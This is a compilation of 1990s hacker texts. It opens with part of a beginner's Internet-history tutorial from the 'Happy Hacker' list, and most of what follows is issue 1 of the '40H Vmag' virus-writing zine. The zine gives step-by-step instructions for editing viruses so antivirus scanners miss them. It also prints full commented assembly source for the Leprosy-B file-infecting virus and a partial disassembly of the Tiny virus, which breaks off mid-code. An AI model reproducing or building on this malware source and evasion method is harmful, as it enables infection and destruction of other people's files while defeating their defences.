learn how to crack into computers for the intellectual challenge and to
figure out how to make computers safe from intruders. They don't bull their
way into root and make a mess of things, which tends to inspire sysadmins to
call the cops.
*********************************
Exciting notice: Is it too boring to just hack into your own Linux machine?
Hang in there. Ira Winkler of the National Computer Security Association,
Dean Garlick of the Space Dynamics Lab of Utah State University and I are
working on setting up hack.net, a place where it will be legal to break into
computers. Not only that, we're looking for sponsors who will give cash
awards and scholarships to those who show the greatest hacking skills. Now
does that sound like more phun than jail?
*****************************
So, let's jump into our hacking basics tutorial with a look at the wondrous
anarchy that is the Internet.
Note that these Guides to (mostly) Harmless Hacking focus on the Internet.
That is because there are many legal ways to hack on the Internet. Also,
there are over 10 million of these readily hackable computers on the
Internet, and the number grows every day.
Internet Basics
No one owns the Internet. No one runs it. It was never planned to be what it
is today. It just happened, the mutant outgrowth of a 1969 US Defense
Advanced Research Projects Agency experiment.
This anarchic system remains tied together because its users voluntarily
obey some basic rules. These rules can be summed up in two words: Unix and
TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and
TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace,
an Uberhacker among hacker wannabes, a master of the Internet universe.
To get technical, the Internet is a world-wide distributed
computer/communications network held together by a common communications
standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit
of UUCP. These standards allow anyone to hook up a computer to the Internet,
which then becomes another node in this network of the Internet. All that is
needed is to get an Internet address assigned to the new computer, which is
then known as an Internet "host," and tie into an Internet communications
link. These links are now available in almost all parts of the world.
If you use an on-line service from your personal computer, you, too, can
temporarily become part of the Internet. There are two main ways to hook up
to an on-line service.
There is the cybercouch potato connection that every newbie uses. It
requires either a point-to-point (PPP) or SLIPconnection, which allows you
to run pretty pictures with your Web browser. If you got some sort of
packaged software from your ISP, it automatically gives you this sort of
connection.
Or you can connect with a terminal emulator to an Internet host. This
program may be something as simple as the Windows 3.1 "Terminal" program
under the "Accessories" icon. Once you have dialed in and connected you are
just another terminal on this host machine. It won't give you pretty
pictures. This connection will be similar to what you get on an
old-fashioned BBS. But if you know how to use this kind of connection, it
could even give you root access to that host.
But how is the host computer you use attached to the Internet? It will be
running some variety of the Unix operating system. Since Unix is so easy to
adapt to almost any computer, this means that almost any computer may become
an Internet host.
For example, I sometimes enter the Internet through a host which is a
Silicon Graphics Indigo computer at Utah State University. Its Internet
address is fantasia.idec.sdl.usu.edu. This is a computer optimized for
computer animation work, but it can also operate as an Internet host. On
other occasions the entry point used may be pegasus.unm.edu, which is an IBM
RS 6000 Model 370. This is a computer optimized for research at the
University of New Mexico.
Any computer which can run the necessary software -- which is basically the
Unix operating system -- has a modem, and is tied to an Internet
communications link, may become an Internet node. Even a PC may become an
Internet host by running one of the Linux flavors of Unix. After setting it
up with Linux you can arrange with the ISP of your choice to link it
permanently to the Internet.
In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and
forwarding of messages on the Internet is handled by the millions of
computers of many types and owned by countless companies, educational
institutions, governmental entities and even individuals.
Each of these computers has an individual address which enables it to be
reached through the Internet if hooked up to a appropriate communications
link. This address may be represented in two ways: as a name or a number.
The communications links of the Internet are also owned and maintained in
the same anarchic fashion as the hosts. Each owner of an Internet host is
responsible for finding and paying for a communications link that will get
that host tied in with at least one other host. Communications links may be
as simple as a phone line, a wireless data link such as cellular digital
packet data, or as complicated as a high speed fiber optic link. As long as
the communications link can use TCP/IP or UUCP, it can fit into the Internet.
Thus the net grows with no overall coordination. A new owner of an Internet
host need only get permission to tie into one communications link to one
other host. Alternatively, if the provider of the communications link
decides this host is, for example, a haven for spammers, it can cut this
"rogue site" off of the Internet. The rogue site then must snooker some
other communications link into tying it into the Internet again.
The way most of these interconnected computers and communications links work
is through the common language of the TCP/IP protocol. Basically, TCP/IP
breaks any Internet communication into discrete "packets." Each packet
includes information on how to rout it, error correction, and the addresses
of the sender and recipient. The idea is that if a packet is lost, the
sender will know it and resend the packet. Each packet is then launched into
the Internet. This network may automatically choose a route from node to
node for each packet using whatever is available at the time, and
reassembles the packets into the complete message at the computer to which
it was addressed.
These packets may follow tortuous routes. For example, one packet may go
from a node in Boston to Amsterdam and back to the US for final destination
in Houston, while another packet from the same message might be routed
through Tokyo and Athens, and so on. Usually, however, the communications
links are not nearly so torturous. Communications links may include fiber
optics, phone lines and satellites.
The strength of this packet-switched network is that most messages will
automatically get through despite heavy message traffic congestion and many
communications links being out of service. The disadvantage is that messages
may simply disappear within the system. It also may be difficult to reach
desired computers if too many communications links are unavailable at the time.
However, all these wonderful features are also profoundly hackable. The
Internet is robust enough to survive -- so its inventors claim -- even
nuclear war. Yet it is also so weak that with only a little bit of
instruction, it is possible to learn how to seriously spoof the system
(forged email) or even temporarily put out of commission other people's
Internet host computers (flood pinging, for example.)
On the other hand, the headers on the packets that carry hacking commands
will give away the account information from which a hacker is operating. For
this reason it is hard to hide perfectly when on the Internet.
It is this tension between this power and robustness and weakness and
potential for confusion that makes the Internet a hacker playground.
For example, HERE IS YOUR HACKER TIP YOU'VE BEEN WAITING FOR THIS ISSUE:
This ftp site was posted on the BUGTRAQ list, which is dedicated to
discussion of Unix security holes. Moderator is Aleph One, who is a genuine
Uberhacker. If you want to subscribe to the BUGTRAQ, email
LIST...@netspace.org with message "subscribe BUGTRAQ."
Now, back to Internet basics.
History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects
Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because
of its value in scientific research, the US National Science Foundation
(NSF) took it over in 1983. But over the years since then it gradually
evolved away from any single source of control. In April 1995 NSF cut the
last apron strings. Now the Internet is run by no one. It just happens and
grows out of the efforts of those who play with it and struggle with the
software and hardware.
Nothing at all like this has ever happened before. We now have a computer
system with a life of its own. We, as hackers, form a big part of the
mutation engine that keeps the Internet evolving and growing stronger. We
also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications
network that would eventually become so redundant, so robust, and so able to
operate without centralized control, that it could even survive nuclear war.
What also happened was that ARPANET evolved into a being that has survived
the end of government funding without even a blip in its growth. Thus its
anarchic offspring, the Internet, has succeeded beyond the wildest dreams of
its original architects.
The Internet has grown explosively, with no end in sight. At its inception
as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it
contained only 1000 hosts. But over the next 5 years this number grew
tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold
to 1 million (1993). Two years later, at the end of 1995, the Internet was
estimated to have at least 6 million host computers. There are probably over
10 million now. There appears to be no end in sight yet to the incredible
growth of this mutant child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is
that demand may eventually far outrace capacity. Because now no entity owns
or controls the Internet, if the capacity of the communications links among
nodes is too small, and it were to become seriously bogged down, it might be
difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on
the Internet commonly known as the "Morris Worm." This virus would make
copies of itself on whatever computer it was on and then send copies over
communications links to other Internet hosts. (It used a bug in sendmail
that allowed access to root, allowing the virus to act as the superuser).
Quickly the exponential spread of this virus made the Internet collapse from
the communications traffic and disk space it tied up.
At the time the Internet was still under some semblance of control by the
National Science Foundation and was connected to only a few thousand
computers. The Net was shut down and all viruses purged from its host
computers, and then the Net was put back into operation. Morris, meanwhile,
was put in jail.
There is some concern that, despite improved security measures (for example,
"firewalls"), someone may find a new way to launch a virus that could again
shut down the Internet. Given the loss of centralized control, restarting it
could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time
of the "Morris Worm" is likely to be impossible. Even if it were possible,
the original ARPANET architects were probably correct in their assessment
that the Net would become more susceptible for massive failure rather than
less if some centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack
of centralized control. No person or organization is now able to control the
Internet. In fact, the difficulty of control became an issue as early as its
first year of operation as ARPANET. In that year email was spontaneously
invented by its users. To the surprise of ARPANET's managers, by the second
year email accounted for the bulk of the communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized
life of its own, in April 1995, the NSF quit funding NSFNET, the fiber
optics communications backbone which at one time had given NSF the
technology to control the system. The proliferation of parallel
communications links and hosts had by then completely bypassed any
possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest
growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet
computers
* Internet relay chat -- real-time text conversations -- used primarily by
hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is
rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less
well known services such as whois, finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet, dating from
the spring of 1992. It consists of "Web pages," which are like pages in a
book, and links from specially marked words, phrases or symbols on each page
to other Web pages. These pages and links together create what is known as
"hypertext." This technique makes it possible to tie together many different
documents which may be written by many people and stored on many different
computers around the world into one hypertext document.
This technique is based upon the Universal Resource Locator (URL) standard,
which specifies how to hook up with the computer and access the files within
it where the data of a Web page may be stored.
A URL is always of the form http://<rest of address>, where <rest of
address> includes a domain name which must be registered with an
organization called InterNIC in order to make sure that two different Web
pages (or email addresses, or computer addresses) don't end up being
identical. This registration is one of the few centralized control features
of the Internet.
Here's how the hypertext of the World Wide Web works. The reader would come
to a statement such as "our company offers LTL truck service to all major US
cities." If this statement on the "Web page" is highlighted, that means that
a click of the reader's computer mouse will take him or her to a new Web
page with details. These may include complete schedules and a form to fill
out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through
credit cards.
However, the security of money transfers over the Internet is still a major
issue. Yet despite concerns with verifiability of financial transactions,
electronic commerce over the Web is growing fast. In its second full year of
existence, 1994, only some $17.6 million in sales were conducted over the
Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is
jammed with commercial sites begging for your credit card information.
In addition, the Web is being used as a tool in the distribution of a new
form of currency, known as electronic cash. It is conceivable that, if the
hurdle of verifiability may be overcome, that electronic cash (often called
ecash) may play a major role in the world economy, simplifying international
trade. It may also eventually make national currencies and even taxation as
we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank
of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The
Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the
World Wide Web. The author of a Web page does not need to get permission or
make any arrangement with the authors of other Web pages to which he or she
wishes to establish links. Links may be established automatically simply by
programming in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people
from reading it or establishing hypertext links to it is to set up a
password protection system (or by not having communications links to the
rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as
anyone may hook a new computer up to the Internet, so also there is no
central authority with control or even knowledge of what is published where
on the World Wide Web. No one needs to ask permission of a central authority
to put up a Web page.
Once a user knows the address (URL) of a Web page, or at least the URL of a
Web page that links eventually to the desired page, then it is possible (so
long as communications links are available) to almost instantly hook up with
this page.
Because of the value of knowing URLs, there now are many companies and
academic institutions that offer searchable indexes (located on the Web) to
the World Wide Web. Automated programs such as Web crawlers search the Web
and catalog the URLs they encounter as they travel from hypertext link to
hypertext link. But because the Web is constantly growing and changing,
there is no way to create a comprehensive catalog of the entire Web.
Email is the second oldest use of the Internet, dating back to the ARPAnet
of 1972. (The first use was to allow people to remotely log in to their
choice of one of the four computers on which ARPAnet was launched in 1971.)
There are two major uses of email: private communications, and broadcasted
email. When broadcasted, email serves to make announcements (one-way
broadcasting), and to carry on discussions among groups of people such as
our Happy Hacker list. In the group discussion mode, every message sent by
every member of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion
groups are majordomo and listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion
list. One problem with email lists is that there was no easy way for people
new to these groups to join them. Another problem is that as the group
grows, a member may be deluged with dozens or hundreds of email messages
each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet
consists of news groups which carry on discussions in the form of "posts."
Unlike an email discussion group, these posts are stored, typically for two
weeks or so, awaiting potential readers. As new posts are submitted to a
news group, they are broadcast to all Internet hosts that are subscribed to
carry the news groups to which these posts belong.
With many Internet connection programs you can see the similarities between
Usenet and email. Both have similar headers, which track their movement
across the Net. Some programs such as Pine are sent up to send the same
message simultaneously to both email addresses and newsgroups. All Usenet
news readers allow you to email the authors of posts, and many also allow
you to email these posts themselves to yourself or other people.
Now, here is a quick overview of the Internet basics we plan to cover in the
next several issues of Guide to (mostly) Harmless Hacking:
1. Unix
We discuss "shells" which allow one to write programs ("scripts") that
automate complicated series of Unix commands. The reader is introduced to
the concept of scripts which perform hacking functions. We introduce Perl,
which is a shell programming language used for the most elite of hacking
scripts such as SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet
from a hackers' perspective. Extra attention is given to UUCP since it is so
hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the
Internet, and how hackers can make it go to the wrong places! How to look up
UUCP hosts (which are not under the domain name system) is included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers
a series of exercises in which the reader can enjoy gaining access to almost
any randomly chosen Internet host. In fact, by the end of the chapter the
reader will have had the chance to practice several dozen techniques for
gaining entry to other peoples' computers. Yet these hacks we teach are 100%
legal!
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See
http://www.feist.com/~tqdb/evis-unv.html. Want to subscribe to this list?
Email majo...@edm.net with the message "subscribe happyhacker." Want to
share some kewl stuph with the Happy Hacker list? Send your messages to
h...@edm.net. To send me confidential email (please, no discussions of
illegal activities) use cme...@techbroker.com. Please direct flames to
dev/nu...@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
--------------------------------------------------------------------
This message is from the HappyHacker mailing list. To unsubscribe,
send mail to majo...@edm.net saying "unsubscribe happyhacker". The
HappyHacker page is at http://www.feist.com/~tqdb/evis-unv.html. This
mailing list is provided by The EDM Network (http://www.edm.net/) as
a public service and is not responsible for its content.
--------------------------------------------------------------------
Ayaaaaaah, Smurf! <splat> - says gargamel. Si.
undo
IneR...@this.net wrote:
> [...]>
> wow, you guys must be psychic, i was thinking the EXACT same
> thing.....
>
> -IneRLogiC <---vagitarian
"vagitarian" -- i'm gonna have to remember that one. HAHAHAHA
Smaug
40H Vmag Issue 1 Volume 1 00000
Introduction -
This is a down and dirty zine on wich gives examples on writing viruses
and this magazines contains code that can be compiled to viruses.
If you are an anti-virus pussy, who is just scared that your hard disk will
get erased so you have a psycological problem with viruses, erase these
files. This aint for you.
INDEX
001...........................Virus Spotlight, The Tiny virus
002...........................How to modify viruses to avoid SCAN
003...........................Sub-Zero virus
004...........................Simple encryption techniques and Leprosy-B
005...........................1992 virus
Staff -
Editior, Technical Consultant - Hellraiser
Co-Editor, Theory Consultant - Bionic Slasher
--
Si
Smaug
40H Vmag Issue 1 Volume 1 00002
- HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT -
OR
HOW TO CREATE NEW VIRUS STRAINS
The problem with most viruses is that this dickhead who lives in California
named John Mcafee gets his greedy hands on them and turns them into big
bucks -- for him. John boy is the reason there are over 500 viruses out
there, and I wouldn't doubt if he weren't resposible for writing at least
ten of them.
So the best thing to do to some Mcafee dependant sucker, or lame board is
this.
Say you have a copy of a played out virus, lets say an older one like
Armstand or Jerusalem. Almost every virus scanner can detect these
viruses cause they been around so long. Now heres a quick way to modify
viruses so the scanners wont catch them, in turn making them new strains.
The tools you need are --
Norton Utilites
Debug and/or
Turbo Debugger by Borland
Now heres what you do.
Step A
------
Make a target file like this with Debug
Copy the below file with your editor to a file called SAMPLE.USR
-------------------------------------------------------------------------------
n sample.com
a
int 20
rcx
2
w
q
------------------------------------------------------------------------------
Then uses Debug to make the file SAMPLE.COM executing this command --
DEBUG < SAMPLE.USR
This will make a two byte called SAMPLE.COM
STEP B
------
Infect the file with the virus. If this is a boot sector virus your on
your own. Do whatever you have to to infect the two byte file.
Make a copy of the file and keep it for safe keeping.
STEP C
------
Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the
lower versions) PCTOOLS Hex Editor will work too but it takes more work.
Now have DISKEDIT Hex-edit the infected file.
Now figure out where the middle of the file is. Next put block on and
go to the end of the file. At the end of the file go to the edit screen and
select fill. Fill the lower half of the file will nonsense characters, its
good to select 255d (FFh) the blank character.
Now save your changes and go to DOS
Now use SCAN to scan the file for viruses. If it detects the virus you
didnt delete the search string that SCAN is searching for. Get it???
You see all SCAN does is search files for strings that are related to viruses.
For example if SCAN was looking for CASCADE it look for something like this-
EB1DAD1273D1FF121F
In every file you specify. So what we are doing is narrowing down where that
string is in the virus that SCAN keeps finding.
So what you have to do is keep deleting parts of the virus with DISKEDIT
untill you finally narrow down the string.
Keep this in mind, search strings are in the first 150 bytes of the file
about 75% of the time.
Ok lets say you narrowed down the search string and lets say it's -
B8 92 19 B7 21 CD
It will most likly be longer but this an example.
Now back to DEBUG - Do the following--
DEBUG
E 0100 b8 92 19 b7 21 cd -- this is the string you found
Then type --
U
This will give you a unassembled look at what the id-string is. In this
example it was
mov ax,1992h
mov bx,21h
int 21h
Now this is what you have to do, and keep in mind the following ---
THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!!
Uses Turbo Debugger to find the string, you can use DEBUG but I don't know
how to do this from debug.
Ok say you got the string on the screen --
mov ax,1992h
mov bh,21h
int 21h
Write down the locations in the file where these strings are. Ex 0100h etc..
Now rearrange the AX mov with the BX mov like this ---
mov bh,21h
mov ax,1992h
int 21h
You see? You didn't change the way the code functions (THATS IF YOU KNOW
WHAT YOUR DOING!) but you changed the codes id-string for SCAN.
Now since Turbo Debugger dosent let you save the changes you must do it
via - Debug.
DEBUG virus.com
a 0122 - This is the address of the string
Now enter the assembler instructions --
mov bh,21
mov ax,1992h
int 21h
w
q
Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does ---
back to the lab. Oh well you get the point.
One warning, this only works with un-encrypting viruses, or on the
encryption mechanism of encrypting files (which will most likely be Scanned).
With that in mind, have fun.
HR
--
Si
Smaug
40H Vmag Issue 1 Volume 1 00004
- SIMPLE ENCRYPTION METHODS -
Encryption is perhaps one of the key parts of writing a virus. If you
have a virus that prints a message to the screen, you don't want infected
files to contain that message.
One easy way to encrypt data is the XOR method. XOR is a matamatical
function that can be used to cifer and decifer data with the same key.
Example --
FF xor A1 = 5E
byte to encrypt^ ^key ^result
and likewise
5E xor A1 = FF
So as you can see an easy way to encrypt/decrypt sensitve data is with the
XOR function.
A popular virus that demonstrates this teqnique is Leprosy-B. By studing the
below example you are on the way to make simple encrypted viruses.
------------------------------------------------------------------------------
; <LEPROSYB.ASM> - Leprosy-B Virus Source
; Copy-ya-right (c) 1990 by PCM2.
;
; This file is the source code to the Leprosy-B virus. It should
; be assembled with an MASM-compatible assembler; it has been tested
; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0.
; It should be made into a .COM file before executing, with either
; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility.
;
; This program has the potential to permanently destroy executable
; images on any disk medium. Other modifications may have been made
; subsequent to the original release by the author, either benign,
; or which could result in further harm should this program be run.
; In any case, the author assumes no responsibility for any damage
; caused by this program, incidental or otherwise. As a precaution,
; this program should not be turned over to irresponsible hands...
; (unlike people like us, that is).
title "Leprosy-B Virus by PCM2, August 1990"
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 666 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$"
virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$"
virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$"
virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,6 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main
------------------------------------------------------------------------------
While the virus is no great wonder the simple encryption method is what is
used by almost all viruses.
HR
--
Si
Smaug
40H Vmag Issue 1 Volume 1 00001
- VIRUS SPOTLIGHT -
The first virus I would like to spotlight is the Tiny virus, lets see
what our good friend Patti Hoffman (bitch) has written about it.
Name: Tiny
Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
V Status: Rare
Discovery: June, 1990
Symptoms: COMMAND.COM & .COM file growth
Origin: Denmark
Eff Length: 163 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected
files
General Comments:
The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
of Iceland in June 1990. This virus is a non-resident generic
.COM file infector, and it will infect COMMAND.COM.
The first time a file infected with the 163 COM Virus is executed,
the virus will attempt to infect the first .COM file in the
current directory. On bootable diskettes, this file will normally
be COMMAND.COM. After the first .COM file is infected,each time
an infected program is executed another .COM file will attempt to
be infected. Files are infected only if their original length is
greater than approximately 1K bytes.
Infected .COM files will increase in length by 163 bytes, and have
date/time stamps in the directory changed to the date/time the
infection occurred. Infected files will also always end with this
hex string: '2A2E434F4D00'.
This virus currently does nothing but replicate, and is the
smallest MS-DOS virus known as of its isolation date.
The Tiny Virus may or may not be related to the Tiny Family.
^like she'd know the difference!
OK, Theres the run down on the smallest MS-DOS virus known to man. As for
it being detected by SCAN we'll see about that.
Here is a dissasembly of the virus, It can be assembled under Turbo Assembler
or MASM.
-----------------------------------------------------------------------------
PAGE 59,132
data_2e equ 1ABh ;start of virus
seg_a segment byte public ;
assume cs:seg_a, ds:seg_a ;assume cs, ds - code
org 100h ;orgin of all COM files
s proc far
start:
jmp loc_1 ;jump to virus
;this is a replacement for an infected file
db 0CDh, 20h, 7, 8, 9 ;int 20h
;pop es
loc_1:
call sub_1 ;
s endp
sub_1 proc near ;
pop si ;locate all virus code via
sub si,10Bh ;si, cause all offsets will
mov bp,data_1[si] ;change when virus infects
add bp,103h ;a COM file
lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI
xor cx,cx ;clear cx - find only normal
;attributes
mov ah,4Eh ;find first file
loc_2:
int 21h ;
jc loc_6 ;no files found? then quit
mov dx,9Eh ;offset of filename found
mov ax,3D02h ;open file for read/write access
int 21h ;
mov bx,ax ;save handle into bx
mov ah,3Fh ;read from file
lea dx,[si+1A8h] ;offset of save buffer
mov di,dx ;
mov cx,3 ;read three bytes
int 21h ;
cmp byte ptr [di],0E9h ;compare buffer to virus id
;string
je loc_4 ;
loc_3:
mov ah,4Fh ;find the next file
jmp short loc_2 ;and test it
loc_4:
mov dx,[di+1] ;lsh of offset
mov data_1[si],dx ;
xor cx,cx ;msh of offset
mov ax,4200h ;set the file pointer
int 21h ;
mov dx,di ;buffer to save read
mov cx,2 ;read two bytes
mov ah,3Fh ;read from file
int 21h ;
cmp word ptr [di],807h ;compare buffer to virus id
je loc_3 ;same? then find another file
;heres where we infect a file
xor dx,dx ;set file pointer
xor cx,cx ;ditto
mov ax,4202h ;set file pointer
int 21h ;
cmp dx,0 ;returns msh
jne loc_3 ;not the same? find another file
cmp ah,0FEh ;lsh = 254???
jae loc_3 ;if more or equal find another file
mov ds:data_2e[si],ax ;point to data
